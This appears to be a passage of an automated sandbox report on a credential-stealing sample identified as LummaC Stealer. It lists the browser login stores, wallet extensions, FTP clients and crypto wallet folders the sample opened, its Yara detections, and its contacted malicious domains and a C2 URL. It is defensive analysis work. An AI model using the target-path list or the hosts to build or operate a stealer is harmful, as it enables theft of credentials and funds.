Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPbox Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPRush Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Searches for user specific document files
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EIVQSAOTAQ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\VWDFPKGDUF Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EIVQSAOTAQ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\VWDFPKGDUF Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\LIJDSFKJZG Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\VWDFPKGDUF Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NYMMPCEIMA Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\VWDFPKGDUF Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\VWDFPKGDUF Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\LIJDSFKJZG Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EIVQSAOTAQ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\LIJDSFKJZG Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EIVQSAOTAQ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NYMMPCEIMA Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000000.00000003.2129877489.00000000017E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2129358643.00000000017E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 1400, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: file.exe PID: 1400, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.21.95.91
 crisiwarny.store United States
13335 CLOUDFLARENETUS true
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false

Contacted Domains

Name IP Active
crisiwarny.store 104.21.95.91 true
presticitpo.store unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
presticitpo.store true
    		unknown
    scriptyprefej.store true
      		unknown
      https://crisiwarny.store/api true
        		unknown
        necklacedmny.store true
          		unknown
          fadehairucw.store true
            		unknown
            navygenerayk.store true
              		unknown
              founpiuer.store true
                		unknown
                thumbystriw.store true
                  		unknown
                  crisiwarny.store true
                    		unknown